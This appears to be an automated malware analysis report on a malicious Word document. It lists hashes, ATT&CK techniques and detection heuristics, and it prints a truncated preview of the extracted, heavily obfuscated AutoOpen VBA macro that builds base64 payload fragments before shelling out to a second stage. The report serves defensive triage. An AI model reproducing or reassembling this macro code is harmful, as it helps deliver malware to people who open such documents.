Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42aadbfd6a8d4f11…

MALICIOUS

Office (OLE)

81.5 KB Created: 2017-10-31 16:33:00 Authoring application: Microsoft Office Word First seen: 2017-11-13
MD5: 66e98c2519905af2b2157818ee5ab1ea SHA-1: 10426f498029a27bba83b033fc9b52908fdf0e21 SHA-256: 42aadbfd6a8d4f1136830aadf2653f1c057e8d5d1672a73f17721e6b0aba103a
184 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen function and utilizes the Shell() function, indicating an attempt to execute arbitrary code. This is further supported by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The macro itself is heavily obfuscated, but its primary function appears to be the execution of a second-stage payload.

Heuristics 7

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11594 bytes
SHA-256: eb0b9023d7fc74af3c04232e826167d592669f74f396101c8cbda0842a73d8c8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 24 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fsbNqDFvZ"
Function ucCVBiZIJ()

qMSlqsQMqG = Mid("EOPMMYU2D45X13EVBFUDW36HW4SAMQAwADQAIAAsADEAMAAxACAALAAgADEAMAA4ACwAIAAxADAAOAAgACwBNQ", 28, 56)
HLKZvhKuvjI = qMSlqsQMqG

fKtLEizOt = Mid("J2ANAAgACwAMQAxADEAIAAsADgAMwAgACwAMQAxADYAIAAsACAAMQAxADQAIAAsACAAMQAwADUALAAxA93OXUCI9P86ORJXI", 3, 78)
fbXKRw = fKtLEizOt

COiTtO = Mid("TAHXRA90HF4WN1PCQAzADYAIAAsACAAMQAxADIAIAAsACAAOQA3ACwAMQAxADYAIAAsADEAMAA0ACwANAAxACwANQA5ACwAOAAzACwAIAAxADEANgAgACwAIAA5ADcAIAAsACAAMQAxADQAIAAsACAAMQAxADYALAA0ADUALAAgADgAMAAsADEAMQA0ACAALAAgADEAMQAxACwAOQA5ACwAIAAxADAAMQAgACwAMQAxADUALAAgADEAMQA1ACAALAAgADMAMgAsADMANgAgACwAISTZCYA", 18, 263)
wipYomWjQK = COiTtO

jETHwiW = Mid("I8ES04VRV39NPU4KFTGJRWF43C5ACwANAA1ACAALAAgADEAMQAxACAALAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAMQAxADYALAAzADIAIAAsACAAMQAxADQAIAAsADkANwAgACwAMQAxADAAIAAsADEAMAAwACwAMQAxADEF6KFY2", 27, 148)
wTPFr = jETHwiW

ZDili = Mid("GIAIAAsACAANQA4ACwANAA3ACwAIAA0ADcALAAxADAAMQAsADEAMAA5ACwAIAAxADAAOQAgACwAIAA5ADcAIAAsACAAMQAxADAAIAAsADEAMAAxACwAMQAxADYAIAAsADQANgAgACwAIAA5ADgALAAgADEAMAAxACwANAA3ACwAOAA5ACAALAAgADEAMAA4ACAALAAxADAANQAgACwAIAA2ADgAIAAsACAV4HSZXG9EN15QLG7OK7IV7QFT", 2, 225)
lIlnnX = ZDili

WwwYwLYm = Mid("WIAAsACAAMQAwADEAIAAsACAAMQAyADAAIAAsADEAMAAxACAALAAgADMAOQAsADUAOQAgACwAIAAxADAAMgAsADEAMQAxACAALAAgADEAMQA0ACAALAAxADAAMQAsACAAOQA3ACAALAA5ADkAIAAsADEAMAA0ACAALAA0ADAAIAAsADMANgAgACwAMQAxADcALAAxADEANAAsADEAMAA4ACAALAAzADIAIABA6SEVMD47SO", 2, 226)
hkZHQiQGMj = WwwYwLYm

zkiplSHMfi = Mid("1YGB761Q0IGUOBJKTSET2EJGWZOA4ACwAMQAxADQALAAgADEAMAAxACwAOQA3ACwAIAAxADAANwAsACAANQA5ACwAIAAxADIANQAsADkAOQAsACAAOQA3ACPX7", 28, 92)
qfjYMp = zkiplSHMfi

oacHnTRzdFQ = Mid("TEMIZQ7IAA5ADgAIAAsACAAMQAxADEALAAgADEAMgAwACwAIAA0ADYAIAAsADEAMAAyACwAIAAxADEANAAsADQANwAgACwAIAA4ADcALAAxADAAMwAsADEAMAA4ACwAMQAwADcALAA2ADcAIAAsACAANAA3ACAALAAgADQANAAgACwAMQAwADQAIAAsACAAMQAxADYAIAAsADEAMQA2ACwAMQAxADXAABCB", 9, 213)
wDzhIOcLujD = oacHnTRzdFQ

FFWIfDO = Mid("8J9XJBMIGHDEAMAAsADEAMAAzACAALAA0ADAAIAAsACAANAAxACwANAA0ACAALAAzADIALAHF7N3TU2ACV", 11, 61)
swRJq = FFWIfDO

VpRZTiFTFi = Mid("A7xADAANAAsADEAMQAxACwAIAAxADEANQAsACAAMQAxADYALAAgADMAMgAgACwAMwA2ACAALAAgADkANQAsACAANAA2ACwAIAA2ADkAIAAsACAAMQAyADAAIAAsACAAOQA5ACAALAAxADAAMQAsADEAMQAyACwAMQAxADYAI4IC7SU9C1", 3, 166)
FrQcNCqrInp = VpRZTiFTFi

oswqWfjT = Mid("7RPSQ5YKG5G2X6FSKEW53ANQA5ACAALAAzADYALAAxADEAOQAsACAAMQAwADEAIAAsADkAOAAsACAAOQA5ACAALAAgADEAMAA4ACwAMQAwADUAIAAsADEAMAAxACAALAAgADEAMQAwACAALAAgADEAMQA2ACwAIAAzADIAIAAsADYAMQAsADMAMgAgACwAMQAxADAALAAgADEAMAAxACAALAAxADEAOQAgACwAIAA0ADUAIAAsADEAMQAxACAALUD2GF", 22, 234)
QwRqNbCEwz = oswqWfjT

aCzbw = Mid("5sADEAMAAxACwAMQAxADAAIAAsACAAMQAxADYALAAgADUAOQAsADMANgAgACwAMQAxADQAIAAsADkANwAgACwAIAAxADEAMAAsADEAMAAwACAALAAxADEAMQAsADEAMAA5ACAALAAzADIALAA2ADEAIAAsACAAMwAyACAALAAxADEAMAAsADEAMAAxACAALAAgADEAMQAA2RZ7NAO1OOL1PVGMDR7CG0V55ESGQ", 2, 200)
fTZSJY = aCzbw

quSMUBHOv = Mid("BRACwAMQAwADUAIAAAC7YQEI5FR7C", 3, 15)
vpkrpI = quSMUBHOv

XzfKCjYJSuU = Mid("U4AGwAIAAxADEAMgAsADUAOAAgACwAIAA0ADcALAA0ADcALAAgADkANwAsACAAMQAxADQALAAgADkAOQAsACAANAA1ACwAIAAxADEAMgAsADEAMAA4ACAALAAxADEANwAgACwAMQAxADUALAA0ADYAIAAsADEAMQAwACwAIAAxADAAMQAsADEAMQA2ACwAIAA0ADcALAAxADEANQAgACwAIAA4ADgALAAxADIAMgMUM7L170HOU24WCOVJ1NRT4ESDSD9LJKT1", 5, 228)
JWQGYGzMUwC = XzfKCjYJSuU

BjUTZO = Mid("2Q6DRZ1PwAIAAxADEANgAgACwAOQA5ACwAMQAwADQAIAAsADEAMgAzACwAIAAxADEAOQAgACwAMQAxADQAIAAsADEAMAA1ACwAIAAxADEANgAgACwAMQAwADEALAAgADQANQAgACwAIAAZN0XC", 9, 133)
YwabWJZt = BjUTZO

CiOrBiD = Mid("VB8A1ADgAIAAsADEAMQA2ACwAIAAxADAAMQAgACwAMUXR5NVUYIYH", 4, 39)
ujmzvOM = CiOrBiD

ZQbZz = Mid("KGX1SAgADQAMwAgACwAIAAzADIAIAAsACAAMwA5ACAALAA0ADYA9X4M69KCAZ2LB", 6, 46)
VZjKqwasrp = ZQbZz

WwfkOWsjVi = Mid("NONPBQHZQP9D2O2E4SDOTYBU9M94MAA5ADgAIAAsACAAMQAwADYALAAgADEAMAAxACwAIAA5ADk
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.